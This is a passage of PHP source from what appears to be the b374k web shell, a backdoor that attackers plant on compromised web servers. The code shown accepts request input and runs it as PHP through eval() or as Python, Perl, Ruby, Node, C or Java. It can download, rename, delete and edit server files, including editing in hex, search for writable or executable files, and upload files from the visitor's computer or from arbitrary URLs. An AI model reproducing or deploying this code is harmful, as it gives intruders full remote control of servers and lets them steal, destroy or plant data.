  1203.         header("Cache-control: max-age=".(60*60*24*7));#
  1204.         readfile($s_d.$s_f);
  1205.         die();
  1206.     } // rename file or folder
  1207.     elseif(isset($_GP['oldname']) && isset($_GP['rename'])){
  1208.         $s_old = $_GP['oldname'];
  1209.         $s_new = $_GP['rename'];
  1210.  
  1211.         $s_renmsg = "";
  1212.         if(@is_dir($s_old)) $s_renmsg = (@rename($s_old, $s_new))? "Directory ".$s_old." renamed to ".$s_new : "Unable to rename directory ".$s_old." to ".$s_new;
  1213.         elseif(@is_file($s_old)) $s_renmsg = (@rename($s_old, $s_new))? "File ".$s_old." renamed to ".$s_new : "Unable to rename file ".$s_old." to ".$s_new;
  1214.         else $s_renmsg = "Cannot find the path specified ".$s_old;
  1215.  
  1216.         $s_result .= notif($s_renmsg);
  1217.         $s_fnew = $s_new;
  1218.     } // confirm delete
  1219.     elseif(!empty($_GP['del'])){
  1220.         $s_del = trim($_GP['del']);
  1221.         $s_result .= notif("Delete ".basename($s_del)." ? <a href='".$s_self."delete=".pl($s_del)."'>Yes</a> | <a href='".$s_self."'>No</a>");
  1222.     } // delete file
  1223.     elseif(!empty($_GP['delete'])){
  1224.         $s_f = $_GP['delete'];
  1225.         $s_delmsg = "";
  1226.  
  1227.         if(@is_file($s_f)) $s_delmsg = (unlink($s_f))? "File removed : ".$s_f : "Unable to remove file ".$s_f;
  1228.         elseif(@is_dir($s_f)){
  1229.             rmdirs($s_f);
  1230.             $s_delmsg = (@is_dir($s_f))? "Unable to remove directory ".$s_f : "Directory removed : ".$s_f;
  1231.         }
  1232.         else $s_delmsg = "Cannot find the path specified ".$s_f;
  1233.         $s_result .= notif($s_delmsg);
  1234.     } // create dir
  1235.     elseif(!empty($_GP['mkdir'])){
  1236.         $s_f = $s_cwd.$_GP['mkdir'];
  1237.         $s_dirmsg = "";
  1238.  
  1239.         $s_num = 1;
  1240.         if(@is_dir($s_f)){
  1241.             $s_pos = strrpos($s_f,"_");
  1242.             if($s_pos!==false) $s_num = (int) substr($s_f, $s_pos+1);
  1243.             while(@is_dir(substr($s_f, 0, $s_pos)."_".$s_num)){
  1244.                 $s_num++;
  1245.             }
  1246.             $s_f = substr($s_f, 0, $s_pos)."_".$s_num;
  1247.         }
  1248.         if(mkdir($s_f)) $s_dirmsg = "Directory created ".$s_f;
  1249.         else $s_dirmsg = "Unable to create directory ".$s_f;
  1250.  
  1251.         $s_result .= notif($s_dirmsg);
  1252.     } // php eval() function
  1253.     if(isset($_GP['x']) && ($_GP['x']=='eval')){
  1254.         $s_code = "";
  1255.         $s_res = "";
  1256.         $s_evaloption = "";
  1257.         $s_lang = "php";
  1258.  
  1259.         if(isset($_GP['evalcode'])){
  1260.             $s_code = $_GP['evalcode'];
  1261.             $s_evaloption = (isset($_GP['evaloption']))? $_GP['evaloption']:"";
  1262.             $s_tmpdir = get_writabledir();
  1263.  
  1264.             if(isset($_GP['lang'])){$s_lang = $_GP['lang'];}
  1265.  
  1266.             if(strtolower($s_lang)=='php'){
  1267.                 ob_start();
  1268.                 eval($s_code);
  1269.                 $s_res = ob_get_contents();
  1270.                 ob_end_clean();
  1271.             }
  1272.             elseif(strtolower($s_lang)=='python'||strtolower($s_lang)=='perl'||strtolower($s_lang)=='ruby'||strtolower($s_lang)=='node'||strtolower($s_lang)=='nodejs'){
  1273.                 $s_rand = md5(time().rand(0,100));
  1274.                 $s_script = $s_tmpdir.$s_rand;
  1275.                 if(file_put_contents($s_script, $s_code)!==false){
  1276.                     $s_res = exe($s_lang." ".$s_evaloption." ".$s_script);
  1277.                     unlink($s_script);
  1278.                 }
  1279.             }
  1280.             elseif(strtolower($s_lang)=='gcc'){
  1281.                 $s_script = md5(time().rand(0,100));
  1282.                 chdir($s_tmpdir);
  1283.                 if(file_put_contents($s_script.".c", $s_code)!==false){
  1284.                     $s_scriptout = $s_win ? $s_script.".exe" : $s_script;
  1285.                     $s_res = exe("gcc ".$s_script.".c -o ".$s_scriptout.$s_evaloption);
  1286.                     if(@is_file($s_scriptout)){
  1287.                         $s_res = $s_win ? exe($s_scriptout):exe("chmod +x ".$s_scriptout." ; ./".$s_scriptout);
  1288.                         rename($s_scriptout, $s_scriptout."del");
  1289.                         unlink($s_scriptout."del");
  1290.                     }
  1291.                     unlink($s_script.".c");
  1292.                 }
  1293.                 chdir($s_cwd);
  1294.             }
  1295.             elseif(strtolower($s_lang)=='java'){
  1296.                 if(preg_match("/class\ ([^{]+){/i",$s_code, $s_r)){
  1297.                     $s_classname = trim($s_r[1]);
  1298.                     $s_script = $s_classname;
  1299.                 }
  1300.                 else{
  1301.                     $s_rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
  1302.                     $s_script = $s_rand;
  1303.                     $s_code = "class ".$s_rand." { ".$s_code . " } ";
  1304.                 }
  1305.                 chdir($s_tmpdir);
  1306.                 if(file_put_contents($s_script.".java", $s_code)!==false){
  1307.                     $s_res = exe("javac ".$s_script.".java");
  1308.                     if(@is_file($s_script.".class")){
  1309.                         $s_res .= exe("java ".$s_evaloption." ".$s_script);
  1310.                         unlink($s_script.".class");
  1311.                     }
  1312.                     unlink($s_script.".java");
  1313.                 }
  1314.                 chdir($s_pwd);
  1315.             }
  1316.         }
  1317.  
  1318.         $s_lang_available = "<option value='php'>php</option>";
  1319.         $s_selected = "";
  1320.         $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_javac");
  1321.         foreach($s_access as $s){
  1322.             if(isset($$s)){
  1323.                 $s_t = explode("_", $s);
  1324.                 $s_checked = ($s_lang == $s_t[1])? "selected" : "";
  1325.                 $s_lang_available .= "<option value='".$s_t[1]."' ".$s_checked.">".$s_t[1]."</option>";
  1326.             }
  1327.         }
  1328.  
  1329.         $s_evaloptionclass = ($s_lang=="php")? "sembunyi":"";
  1330.         $s_e_result = (!empty($s_res))? "<pre id='evalres' class='bt' style='margin:4px 0 0 0;padding:6px 0;' >".hss($s_res)."</pre>":"";
  1331.         $s_result .= "<form action='".$s_self."' method='post'>
  1332.                     <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>".hss($s_code)."</textarea>
  1333.                     <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>
  1334.                     </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>
  1335.                     ".$s_lang_available."
  1336.                     </select>
  1337.                     </td>
  1338.                     <td><div title='If you want to give additional option to interpreter or compiler, give it here' id='additionaloption' class='".$s_evaloptionclass."'>Additional option&nbsp;&nbsp;<input class='inputz' style='width:400px;' type='text' name='evaloption' value='".hss($s_evaloption)."' id='evaloption' /></div></td>
  1339.                     </tr>
  1340.                     </table>
  1341.                     ".$s_e_result."
  1342.                     <input type='hidden' name='x' value='eval' />
  1343.                     </form>";
  1344.     } // find
  1345.     elseif(isset($_GP['find'])){
  1346.         $s_p = $_GP['find'];
  1347.  
  1348.         $s_type = isset($_GP['type'])? $_GP['type'] : "sfile";
  1349.         $s_sfname = (!empty($_GP['sfname']))? $_GP['sfname']:'';
  1350.         $s_sdname = (!empty($_GP['sdname']))? $_GP['sdname']:'';
  1351.         $s_sfcontain = (!empty($_GP['sfcontain']))? $_GP['sfcontain']:'';
  1352.  
  1353.         $s_sfnameregexchecked = $s_sfnameicasechecked = $s_sdnameregexchecked = $s_sdnameicasechecked = $s_sfcontainregexchecked = $s_sfcontainicasechecked = $s_swritablechecked = $s_sreadablechecked = $s_sexecutablechecked = "";
  1354.         $s_sfnameregex = $s_sfnameicase = $s_sdnameregex = $s_sdnameicase = $s_sfcontainregex = $s_sfcontainicase = $s_swritable = $s_sreadable = $s_sexecutable = false;
  1355.  
  1356.         if(isset($_GP['sfnameregex'])){ $s_sfnameregex=true; $s_sfnameregexchecked="checked"; }
  1357.         if(isset($_GP['sfnameicase'])){ $s_sfnameicase=true; $s_sfnameicasechecked="checked"; }
  1358.         if(isset($_GP['sdnameregex'])){ $s_sdnameregex=true; $s_sdnameregexchecked="checked"; }
  1359.         if(isset($_GP['sdnameicase'])){ $s_sdnameicase=true; $s_sdnameicasechecked="checked"; }
  1360.         if(isset($_GP['sfcontainregex'])){ $s_sfcontainregex=true; $s_sfcontainregexchecked="checked"; }
  1361.         if(isset($_GP['sfcontainicase'])){ $s_sfcontainicase=true; $s_sfcontainicasechecked="checked"; }
  1362.         if(isset($_GP['swritable'])){ $s_swritable=true; $s_swritablechecked="checked"; }
  1363.         if(isset($_GP['sreadable'])){ $s_sreadable=true; $s_sreadablechecked="checked"; }
  1364.         if(isset($_GP['sexecutable'])){ $s_sexecutable=true; $s_sexecutablechecked="checked"; }
  1365.  
  1366.         $s_sexecb = (function_exists("is_executable"))? "<input class='css-checkbox' type='checkbox' name='sexecutable' value='sexecutable' id='se' ".$s_sexecutablechecked." /><label class='css-label' for='se'>Executable</span>":"";
  1367.  
  1368.         $s_candidate = array();
  1369.         if(isset($_GP['sgo'])){
  1370.             $s_af = "";
  1371.  
  1372.             $s_candidate = getallfiles($s_p);
  1373.             if($s_type=='sfile') $s_candidate = @array_filter($s_candidate, "is_file");
  1374.             elseif($s_type=='sdir') $s_candidate = @array_filter($s_candidate, "is_dir");
  1375.  
  1376.             foreach($s_candidate as $s_a){
  1377.                 if($s_type=='sdir'){
  1378.                     if(!empty($s_sdname)){
  1379.                         if($s_sdnameregex){
  1380.                             if($s_sdnameicase){if(!preg_match("/".$s_sdname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
  1381.                             else{if(!preg_match("/".$s_sdname."/", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
  1382.                         }
  1383.                         else{
  1384.                             if($s_sdnameicase){if(strpos(strtolower(basename($s_a)), strtolower($s_sdname))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1385.                             else{if(strpos(basename($s_a), $s_sdname)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1386.                         }
  1387.                     }
  1388.                 }
  1389.                 elseif($s_type=='sfile'){
  1390.                     if(!empty($s_sfname)){
  1391.                         if($s_sfnameregex){
  1392.                             if($s_sfnameicase){if(!preg_match("/".$s_sfname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
  1393.                             else{if(!preg_match("/".$s_sfname."/", basename($s_a))) $s_candidate = array_diff($s_candidate, array($s_a));}
  1394.                         }
  1395.                         else{
  1396.                             if($s_sfnameicase){if(strpos(strtolower(basename($s_a)), strtolower($s_sfname))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1397.                             else{if(strpos(basename($s_a), $s_sfname)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1398.                         }
  1399.                     }
  1400.                     if(!empty($s_sfcontain)){
  1401.                         $s_sffcontent = @fgc($s_a);
  1402.                         if($s_sfcontainregex){
  1403.                             if($s_sfcontainicase){if(!preg_match("/".$s_sfcontain."/i", $s_sffcontent)) $s_candidate = array_diff($s_candidate, array($s_a));}
  1404.                             else{if(!preg_match("/".$s_sfcontain."/",  $s_sffcontent)) $s_candidate = array_diff($s_candidate, array($s_a));}
  1405.                         }
  1406.                         else{
  1407.                             if($s_sfcontainicase){if(strpos(strtolower($s_sffcontent), strtolower($s_sfcontain))===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1408.                             else{if(strpos($s_sffcontent, $s_sfcontain)===false) $s_candidate = array_diff($s_candidate, array($s_a));}
  1409.                         }
  1410.                     }
  1411.                 }
  1412.             }
  1413.         }
  1414.  
  1415.         $s_f_result = ""; $s_link="";
  1416.         foreach($s_candidate as $s_c){
  1417.             $s_c = trim($s_c);
  1418.             if($s_swritable && !@is_writable($s_c)) continue;
  1419.             if($s_sreadable && !@is_readable($s_c)) continue;
  1420.             if($s_sexecutable && !@is_executable($s_c)) continue;
  1421.  
  1422.             if($s_type=="sfile") $s_link = $s_self."view=".pl($s_c);
  1423.             elseif($s_type=="sdir") $s_link = $s_self."view=".pl(cp($s_c));
  1424.             $s_f_result .= "<p class='notif' ondblclick=\"return go('".adds($s_link)."',event);\"><a href='".$s_link."'>".$s_c."</a></p>";
  1425.         }
  1426.  
  1427.         $s_tsdir = ($s_type=="sdir")? "selected":"";
  1428.         $s_tsfile = ($s_type=="sfile")? "selected":"";
  1429.  
  1430.         if(!@is_dir($s_p)) $s_result .= notif("Cannot find the path specified ".$s_p);
  1431.  
  1432.         $s_result .= "<form action='".$s_self."' method='post'>
  1433.         <div class='mybox'><h2>Find</h2>
  1434.         <table class='myboxtbl'>
  1435.         <tr><td style='width:140px;'>Search in</td>
  1436.         <td colspan='2'><input style='width:100%;' value='".hss($s_p)."' class='inputz' type='text' name='find' /></td></tr>
  1437.         <tr onclick=\"findtype('sdir');\">
  1438.             <td>Dirname contains</td>
  1439.             <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='".hss($s_sdname)."' /></td>
  1440.             <td>
  1441.                 <input type='checkbox' class='css-checkbox' name='sdnameregex' id='sdn' ".$s_sdnameregexchecked." /><label class='css-label' for='sdn'>Regex (pcre)</label>
  1442.                 <input type='checkbox' class='css-checkbox' name='sdnameicase' id='sdi' ".$s_sdnameicasechecked." /><label class='css-label' for='sdi'>Case Insensitive</label>
  1443.             </td>
  1444.         </tr>
  1445.         <tr onclick=\"findtype('sfile');\">
  1446.             <td>Filename contains</td>
  1447.             <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='".hss($s_sfname)."' /></td>
  1448.             <td>
  1449.                 <input type='checkbox' class='css-checkbox' name='sfnameregex'  id='sfn' ".$s_sfnameregexchecked." /><label class='css-label' for='sfn'>Regex (pcre)</label>
  1450.                 <input type='checkbox' class='css-checkbox' name='sfnameicase'  id='sfi' ".$s_sfnameicasechecked." /><label class='css-label' for='sfi'>Case Insensitive</label>
  1451.             </td>
  1452.         </tr>
  1453.         <tr onclick=\"findtype('sfile');\">
  1454.             <td>File contains</td>
  1455.             <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='".hss($s_sfcontain)."' /></td>
  1456.             <td>
  1457.                 <input type='checkbox' class='css-checkbox' name='sfcontainregex' id='sff' ".$s_sfcontainregexchecked." /><label class='css-label' for='sff'>Regex (pcre)</label>
  1458.                 <input type='checkbox' class='css-checkbox' name='sfcontainicase' id='sffi' ".$s_sfcontainicasechecked." /><label class='css-label' for='sffi'>Case Insensitive</label>
  1459.             </td>
  1460.         </tr>
  1461.         <tr>
  1462.             <td>Permissions</td>
  1463.             <td colspan='2'>
  1464.                 <input type='checkbox' class='css-checkbox' name='swritable' id='sw' ".$s_swritablechecked." /><label class='css-label' for='sw'>Writable</label>
  1465.                 <input type='checkbox' class='css-checkbox' name='sreadable' id='sr' ".$s_sreadablechecked." /><label class='css-label' for='sr'>Readable</label>
  1466.                 ".$s_sexecb."
  1467.             </td>
  1468.         </tr>
  1469.         <tr><td>
  1470.         <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:0;' />
  1471.         </td>
  1472.         <td>
  1473.         <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:0;padding:4px;'>
  1474.             <option value='sfile' ".$s_tsfile.">Search file</option>
  1475.             <option value='sdir' ".$s_tsdir.">Search dir</option>
  1476.         </select>
  1477.         </td>
  1478.         <td></td></tr>
  1479.         </table>
  1480.         </div>
  1481.         </form>
  1482.         <div>
  1483.         ".$s_f_result."
  1484.         </div>";
  1485.     } // upload
  1486.     elseif(isset($_GP['x']) && ($_GP['x']=='upload')){
  1487.         $s_result = " ";
  1488.         $s_msg = "";
  1489.         if(isset($_GP['uploadhd'])){
  1490.             $c = count($_FILES['filepath']['name']);
  1491.             for($i = 0; $i<$c; $i++){
  1492.                 $s_fn = $_FILES['filepath']['name'][$i];
  1493.                 if(empty($s_fn)) continue;
  1494.                 if(is_uploaded_file($_FILES['filepath']['tmp_name'][$i])){
  1495.                     $s_p = cp($_GP['savefolder'][$i]);
  1496.                     if(!@is_dir($s_p)) mkdir($s_p);
  1497.                     if(isset($_GP['savefilename'][$i]) && (trim($_GP['savefilename'][$i])!="")) $s_fn = $_GP['savefilename'][$i];
  1498.                     $s_tm = $_FILES['filepath']['tmp_name'][$i];
  1499.                     $s_pi = cp($s_p).$s_fn;
  1500.                     $s_st = @move_uploaded_file($s_tm,$s_pi);
  1501.                     if($s_st) $s_msg .= notif("File uploaded to <a href='".$s_self."view=".pl($s_pi)."'>".$s_pi."</a>");
  1502.                     else $s_msg .= notif("Failed to upload ".$s_fn);
  1503.                 }
  1504.                 else $s_msg .= notif("Failed to upload ".$s_fn);
  1505.             }
  1506.         }
  1507.         elseif(isset($_GP['uploadurl'])){
  1508.             // function dlfile($s_url,$s_fpath)
  1509.             $c = count($_GP['fileurl']);
  1510.             for($i = 0; $i<$c; $i++){
  1511.                 $s_fu = $_GP['fileurl'][$i];
  1512.                 if(empty($s_fu)) continue;
  1513.  
  1514.                 $s_p = cp($_GP['savefolderurl'][$i]);
  1515.                 if(!@is_dir($s_p)) mkdir($s_p);
  1516.  
  1517.                 $s_fn = basename($s_fu);
  1518.                 if(isset($_GP['savefilenameurl'][$i]) && (trim($_GP['savefilenameurl'][$i])!="")) $s_fn = $_GP['savefilenameurl'][$i];
  1519.                 $s_fp = cp($s_p).$s_fn;
  1520.                 $s_st = dlfile($s_fu,$s_fp);
  1521.                 if($s_st) $s_msg .= notif("File uploaded to <a href='".$s_self."view=".pl($s_fp)."'>".$s_fp."</a>");
  1522.                 else $s_msg .= notif("Failed to upload ".$s_fn);
  1523.             }
  1524.         }
  1525.         else{
  1526.             if(!@is_writable($s_cwd)) $s_msg = notif("Directory ".$s_cwd." is not writable, please change to a writable one");
  1527.         }
  1528.  
  1529.         if(!empty($s_msg)) $s_result .= $s_msg;
  1530.         $s_result .= "
  1531.             <form action='".$s_self."' method='post' enctype='multipart/form-data'>
  1532.             <div class='mybox'><h2><div class='but' onclick='adduploadc();'>+</div>Upload from computer</h2>
  1533.             <table class='myboxtbl'>
  1534.             <tbody id='adduploadc'>
  1535.             <tr><td style='width:140px;'>File</td><td><input type='file' name='filepath[]' class='inputzbut' style='width:400px;margin:0;' /></td></tr>
  1536.             <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolder[]' value='".hss($s_cwd)."' /></td></tr>
  1537.             <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilename[]' value='' /></td></tr>
  1538.             </tbody>
  1539.             <tfoot>
  1540.             <tr><td>&nbsp;</td><td>
  1541.             <input type='submit' name='uploadhd' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  1542.             <input type='hidden' name='x' value='upload' />
  1543.             </td></tr>
  1544.             </tfoot>
  1545.             </table>
  1546.             </div>
  1547.             </form>
  1548.             <form action='".$s_self."' method='post'>
  1549.             <div class='mybox'><h2><div class='but' onclick='adduploadi();'>+</div>Upload from internet</h2>
  1550.             <table class='myboxtbl'>
  1551.             <tbody id='adduploadi'>
  1552.             <tr><td style='width:150px;'>File URL</td><td><input style='width:100%;' class='inputz' type='text' name='fileurl[]' value='' />
  1553.             </td></tr>
  1554.             <tr><td>Save to</td><td><input style='width:100%;' class='inputz' type='text' name='savefolderurl[]' value='".hss($s_cwd)."' /></td></tr>
  1555.             <tr><td>Filename (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='savefilenameurl[]' value='' /></td></tr>
  1556.             </tbody>
  1557.             <tfoot>
  1558.             <tr><td>&nbsp;</td><td>
  1559.             <input type='submit' name='uploadurl' class='inputzbut' value='Upload !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  1560.             <input type='hidden' name='x' value='upload' />
  1561.             </td></tr>
  1562.             </table>
  1563.             </div>
  1564.             </form>";
  1565.     } // view file
  1566.     elseif(isset($_GP['view'])){
  1567.         $s_f = $_GP['view'];
  1568.         if(isset($s_fnew) && (trim($s_fnew)!="")) $s_f = $s_fnew;
  1569.  
  1570.         $s_owner = "";
  1571.         if(@is_file($s_f)){
  1572.             $targetdir = dirname($s_f);
  1573.             chdir($targetdir);
  1574.             $s_cwd = cp(getcwd());
  1575.             setcookie("cwd", $s_cwd ,time() + $s_login_time);
  1576.  
  1577.             if(!$s_win && $s_posix){
  1578.                 $s_name = posix_getpwuid(fileowner($s_f));
  1579.                 $s_group = posix_getgrgid(filegroup($s_f));
  1580.                 $s_owner = "<tr><td>Owner</td><td>".$s_name['name']."<span class='gaya'>:</span>".$s_group['name']."</td></tr>";
  1581.             }
  1582.             $s_filn = basename($s_f);
  1583.             $s_result .= "<table class='viewfile' style='width:100%;'>
  1584.             <tr><td style='width:140px;'>Filename</td><td><span id='".cs($s_filn)."_link'>".$s_f."</span>
  1585.             <div id='".cs($s_filn)."_form' class='sembunyi'>
  1586.             <form action='".$s_self."' method='post'>
  1587.                 <input type='hidden' name='oldname' value='".hss($s_f)."' style='margin:0;padding:0;' />
  1588.                 <input type='hidden' name='view' value='".hss($s_f)."' />
  1589.                 <input class='inputz' style='width:200px;' type='text' name='rename' value='".hss($s_f)."' />
  1590.                 <input class='inputzbut' type='submit' value='rename' />
  1591.             </form>
  1592.             <input class='inputzbut' type='button' value='x' onclick=\"tukar_('".cs($s_filn)."_form','".cs($s_filn)."_link');\" />
  1593.             </div>
  1594.             </td></tr>
  1595.             <tr><td>Size</td><td>".gs($s_f)." (".@filesize($s_f).")</td></tr>
  1596.             <tr><td>Permission</td><td>".gp($s_f)."</td></tr>
  1597.             ".$s_owner."
  1598.             <tr><td>Create time</td><td>".@date("d-M-Y H:i:s",filectime($s_f))."</td></tr>
  1599.             <tr><td>Last modified</td><td>".@date("d-M-Y H:i:s",filemtime($s_f))."</td></tr>
  1600.             <tr><td>Last accessed</td><td>".@date("d-M-Y H:i:s",fileatime($s_f))."</td></tr>
  1601.             <tr><td>Actions</td><td>
  1602.             <a href='".$s_self."edit=".pl($s_f)."' title='edit'>edit</a> | <a href='".$s_self."hexedit=".pl($s_f)."' title='edit as hex'>hex</a> | <a href=\"javascript:tukar_('".cs($s_filn)."_link','".cs($s_filn)."_form');\" title='rename'>ren</a> | <a href='".$s_self."del=".pl($s_f)."' title='delete'>del</a> | <a href='".$s_self."dl=".pl($s_f)."'>dl</a>
  1603.             </td></tr>
  1604.             <tr><td>View</td><td>
  1605.             <a href='".$s_self."view=".pl($s_f)."&type=text"."'>text</a> | <a href='".$s_self."view=".pl($s_f)."&type=code"."'>code</a> | <a href='".$s_self."view=".pl($s_f)."&type=image"."'>image</a> | <a href='".$s_self."view=".pl($s_f)."&type=audio"."'>audio</a> | <a href='".$s_self."view=".pl($s_f)."&type=video"."'>video</a>
  1606.             </td></tr>
  1607.             </table>";
  1608.  
  1609.             $s_t = ""; $s_mime = "";
  1610.             $s_mime_list = gzinflate(base64_decode($s_mime_types));
  1611.             $s_ext_pos = strrpos($s_f, ".");
  1612.             if($s_ext_pos!==false){
  1613.                 $s_ext = trim(substr($s_f, $s_ext_pos),".");
  1614.                 if(preg_match("/([^\s]+)\ .*\b".$s_ext."\b.*/i",$s_mime_list,$s_r)){
  1615.                     $s_mime = $s_r[1];
  1616.                 }
  1617.             }
  1618.  
  1619.             $s_iinfo = @getimagesize($s_f);
  1620.             if(strtolower(substr($s_filn,-3,3)) == "php") $s_t = "code";
  1621.             elseif(is_array($s_iinfo)) $s_t = 'image';
  1622.             elseif(!empty($s_mime)) $s_t = substr($s_mime,0,strpos($s_mime,"/"));
  1623.  
  1624.             if(isset($_GP['type'])) $s_t = $_GP['type'];
  1625.  
  1626.             if($s_t=="image"){
  1627.                 $s_width = (int) $s_iinfo[0];
  1628.                 $s_height = (int) $s_iinfo[1];
  1629.                 $s_imginfo = "Image type = ( ".$s_iinfo['mime']." )<br />
  1630.                     Image Size = <span class='gaul'>( </span>".$s_width." x ".$s_height."<span class='gaul'> )</span><br />";
  1631.                 if($s_width > 800){
  1632.                     $s_width = 800;
  1633.                     $s_imglink = "<p><a href='".$s_self."img=".pl($s_filn)."'>
  1634.                     <span class='gaul'>[ </span>view full size<span class='gaul'> ]</span></a></p>";
  1635.                 }
  1636.                 else $s_imglink = "";
  1637.  
  1638.                 $s_result .= "<div class='viewfilecontent' style='text-align:center;'>".$s_imglink."
  1639.                     <img width='".$s_width."' src='".$s_self."img=".pl($s_filn)."' alt='".$s_filn."' style='margin:8px auto;padding:0;border:0;' /></div>";
  1640.  
  1641.             }
  1642.             elseif($s_t=="code"){
  1643.                 $s_result .= "<div class=\"viewfilecontent\">";
  1644.                 $s_file = wordwrap(@fgc($s_f),160,"\n",true);
  1645.                 $s_buff = highlight_string($s_file,true);
  1646.                 $s_old = array("0000BB", "000000", "FF8000", "DD0000", "007700");
  1647.                 $s_new = ($s_theme=="bright")? $s_highlight_bright:$s_highlight_dark;
  1648.                 $s_buff = str_replace($s_old,$s_new, $s_buff);
  1649.                 $s_result .= $s_buff;
  1650.                 $s_result .=  "</div>";
  1651.             }
  1652.             elseif($s_t=="audio" || $s_t=="video"){
  1653.                 $s_result .= "<div class='viewfilecontent' style='text-align:center;'>
  1654.                             <".$s_t." controls>
  1655.                             <source src='".hss($s_self."dltype=raw&dlpath=".$s_f)."' type='".$s_mime."'>
  1656.                                 <object data='".hss($s_self."dltype=raw&dlpath=".$s_f)."'>
  1657.                                     <embed src='".hss($s_self."dltype=raw&dlpath=".$s_f)."'>
  1658.                                 </object>
  1659.                             </".$s_t.">
  1660.                             </div>";
  1661.             }
  1662.             else {
  1663.                 $s_result .= "<pre style='padding: 3px 8px 0 8px;' class='viewfilecontent'>";
  1664.                 $s_result .=  str_replace("<", "&lt;",str_replace(">", "&gt;",(wordwrap(@fgc($s_f),160,"\n",true))));
  1665.                 $s_result .=   "</pre>";
  1666.             }
  1667.         }
  1668.         elseif(@is_dir($s_f)){
  1669.             chdir($s_f);
  1670.             $s_cwd = cp(getcwd());
  1671.             setcookie("cwd", $s_cwd ,time() + $s_login_time);
  1672.             $s_result .= showdir($s_cwd);
  1673.         }
  1674.         else $s_result .= notif("Cannot find the path specified ".$s_f);
  1675.  
  1676.     } // edit file
  1677.     elseif(isset($_GP['edit'])){
  1678.         $s_f = $_GP['edit'];
  1679.         $s_fc = ""; $s_fcs = "";
  1680.  
  1681.         if(isset($_GP['new']) && ($_GP['new']=='yes')){
  1682.             $s_num = 1;
  1683.             if(@is_file($s_f)){
  1684.                 $s_pos = strrpos($s_f,"_");
  1685.                 if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
  1686.                 while(@is_file(substr($s_f,0,$s_pos)."_".$s_num)){
  1687.                     $s_num++;
  1688.                 }
  1689.                 $s_f = substr($s_f,0,$s_pos)."_".$s_num;
  1690.             }
  1691.         }
  1692.         else if(@is_file($s_f)) $s_fc = @fgc($s_f);
  1693.  
  1694.         if(isset($_GP['fc'])){
  1695.             $s_fc = $_GP['fc'];
  1696.             $s_eol = $_GP['eol'];
  1697.             $s_eolf = pack("H*", geol($s_fc));
  1698.             $s_eolh = pack("H*", $s_eol);
  1699.             $s_fc = str_replace($s_eolf, $s_eolh, $s_fc);
  1700.  
  1701.             if($s_filez = fopen($s_f,"w")){
  1702.                 $s_time = @date("d-M-Y H:i:s",time());
  1703.                 if(fwrite($s_filez,$s_fc)!==false) $s_fcs = "File saved @ ".$s_time;
  1704.                 else $s_fcs = "Failed to save";
  1705.                 fclose($s_filez);
  1706.             }
  1707.             else $s_fcs = "Permission denied";
  1708.         }
  1709.         elseif(@is_file($s_f) && !@is_writable($s_f)) $s_fcs = "This file is not writable";
  1710.  
  1711.         $s_eol = geol($s_fc);
  1712.  
  1713.         if(!empty($s_fcs)) $s_result .= notif($s_fcs);
  1714.         $s_result .= "<form action='".$s_self."' method='post'>
  1715.                 <textarea id='fc' name='fc' class='txtarea'>".hss($s_fc)."</textarea>
  1716.                 <p style='text-align:center;'><input type='text' class='inputz' style='width:99%;' name='edit' value='".hss($s_f)."' /></p>
  1717.                 <p><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' /></p>
  1718.                 <input type='hidden' name='eol' value='".$s_eol."' />
  1719.                 </form>";
  1720.  
  1721.     } // hex edit file
  1722.     elseif(isset($_GP['hexedit'])){
  1723.         $s_f = $_GP['hexedit'];
  1724.         $s_fc = ""; $s_fcs = ""; $s_hexes = "";
  1725.         $s_lnum = 0;
  1726.  
  1727.         if(!empty($_GP['hx']) || !empty($_GP['hxt'])){
  1728.             if(!empty($_GP['hx'])){
  1729.                 foreach($_GP['hx'] as $s_hex) $s_hexes .= str_replace(" ", "", $s_hex);
  1730.             }
  1731.             elseif(!empty($_GP['hxt'])){
  1732.                 $s_hexes = trim($_GP['hxt']);
  1733.             }
  1734.             if($s_filez = fopen($s_f,"w")){
  1735.                     $s_bins = pack("H*", $s_hexes);
  1736.                     $s_time = @date("d-M-Y H:i:s", time());
  1737.                     if(fwrite($s_filez,$s_bins)!==false) $s_fcs = "File saved @ ".$s_time;
  1738.                     else $s_fcs = "Failed to save";
  1739.                     fclose($s_filez);
  1740.                 }
  1741.             else $s_fcs = "Permission denied";
  1742.         }
  1743.         else if(@is_file($s_f) && !@is_writable($s_f)) $s_fcs = "This file is not writable";
  1744.  
  1745.         if(!empty($s_fcs)) $s_result .= notif($s_fcs);
  1746.  
  1747.         $s_result .= "<form action='".$s_self."' method='post'><p class='ce mp'><input type='text' class='inputz' style='width:100%;' name='hexedit' value='".hss($s_f)."' /></p><p class='bb' style='padding:0 0 14px 0;'><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return sh();\" /></p><table class='explore'>";
  1748.  
  1749.         if(@is_file($s_f)){
